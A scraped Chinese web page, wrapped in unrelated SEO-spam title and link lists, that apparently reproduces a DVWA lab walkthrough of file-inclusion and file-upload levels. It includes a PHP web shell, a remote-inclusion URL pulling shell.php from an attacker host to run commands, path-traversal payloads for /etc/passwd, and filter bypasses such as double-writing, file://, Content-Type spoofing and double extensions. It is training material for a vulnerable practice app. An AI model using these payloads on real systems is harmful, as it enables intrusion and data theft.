当前位置: 首页 > news >正文

wordpress 个性插件深圳债务优化公司

news 2025/7/13 22:04:19
wordpress 个性插件,深圳债务优化公司,短链接生成站长工具,益阳 网站制作维护文件包含 本地文件包含(敏感信息泄露)和远程文件包含(命令执行) 本地文件包含一般包含一些本地的敏感文件,如:/etc/passwd或/etc/shadow等 远程文件包含能使得服务器代码执行,如包含黑客vps的…

文件包含

本地文件包含(敏感信息泄露)和远程文件包含(命令执行)

  • 本地文件包含一般包含一些本地的敏感文件,如:/etc/passwd或/etc/shadow等

  • 远程文件包含能使得服务器代码执行,如包含黑客vps的http://192.168.72.162:8000/shell.php文件,而文件内容如下:<?php system('whoami')?>

测试环境

本地文件包含不用什么测试环境,只要有个文件,就能知道其是否触发,远程文件包含需要我们写个php代码,如下

<?php
echo "this is the remote file"."\n";
system($_GET['a']);
?>

然后python -m http.server 开个服务器,让dvwa能包含我们的php代码

easy

  • linux服务下的本地文件包含

../../../../../../etc/passwd

  • windows服务下的本地文件包含

我的php网站部署在F盘,在F盘下放一个test.txt
​
../../../../../../test.txt能将文件读出
或者直接绝对路径:
​
C:/Windows/system.ini

  • 远程文件包含

http://www.oswe.com/dvwa/vulnerabilities/fi/?page=http://192.168.72.162:8000/shell.php&a=whoami
​
访问成功如下图:

 

medium
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );
​
方法1:
直接输入绝对路径
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=F:/test.txt
正常输出
​
方法2:双写绕过
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=
..././..././..././..././..././..././..././..././test.txt
​
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.72.162:8000/shell.php&a=whoami
high
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {// This isn't the page we want!echo "ERROR: File not found!";exit;
}
​
上面的逻辑是,如果参数没有file字符串,且不是include.php,直接过滤,所以这个情况不能使用远程文件包含了
我们通过伪协议file bypass
​
page=file:///C:/Windows/system.ini或
page=file:///../../../../../../../../test.txt
impossible
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {// This isn't the page we want!echo "ERROR: File not found!";exit;
}
​
后台只允许包含这4个文件

文件上传

文件上传只有medium、high、impossible三种难度

准备个php脚本

<?php
system($_GET['a']);
?>
medium
检测:请求头
​
抓包,修改数据包,直接过
Content-Type: image/jpeg
high
检测:后缀是否为jpg、jpeg、png
​
上传
shell.php.jpg或shell.php.png都能被解析为php文件(总感觉哪里很怪)

 

impossible
imagecreatefrompng
imagecreatefromjpeg
由文件或url创建一个新图像,如果解析图像失败会报错
​
上传的文件会成为md5值.png或md5值.jpg的形式,web服务器不会将其解析为php文件
http://www.tj-hxxt.cn/news/16298.html

相关文章:

  • 龙之向导外贸经理人网站网站推广的具体方案
  • 怎样用织梦做音乐网站网站关键词排名优化价格
  • 大学生做网站主题常用的seo查询工具有哪些
  • 广西核心关键词seo报价优化关键词排名软件
  • 转转怎么做钓鱼网站百度关键词优化专家
  • 网站文字怎么做超链接百度知识营销
  • 凤阳做网站网站推广100种方法
  • 沙市做网站weisword如何查询百度收录情况
  • 珠海十大网站建设公司排名磁力屋 最好用
  • 手机端网站开发建设内容index百度指数
  • 用dedecms做的网站是模板网站么推广普通话手抄报图片
  • 个人网站备案说明2022年最火文案
  • 男做变态手术视频网站百度搜索电话
  • 90设计电商模板百度词条优化工作
  • 公司网站建设开源平台优化大师怎么提交作业
  • html网站模仿seo搜索引擎优化工资
  • 天津网站建设开发有哪些有友情链接的网站
  • 网站开发专业大学查关键词
  • pageadmin政府网站管理系知识营销案例
  • 男的做直播哪个网站好市场营销专业课程
  • wordpress插件吧学seo哪个培训好
  • 做我的奴隶腾讯网站网络营销到底是干嘛的
  • 公司网站开发款记什么科目帮别人推广app赚钱
  • 叫别人做网站后怎么更改密码营销型企业网站建设步骤
  • 做网站优化的协议书社群推广平台
  • 上海做网站优化哪家好链接地址
  • 织梦做的网站_别人提交给我留的言我去哪里看网站制作推广电话
  • 成都百度网站设计公司微信小程序开发多少钱
  • 上海网站营论坛优化seo
  • 中国工程建设造价管理协会网站站长之家工具高清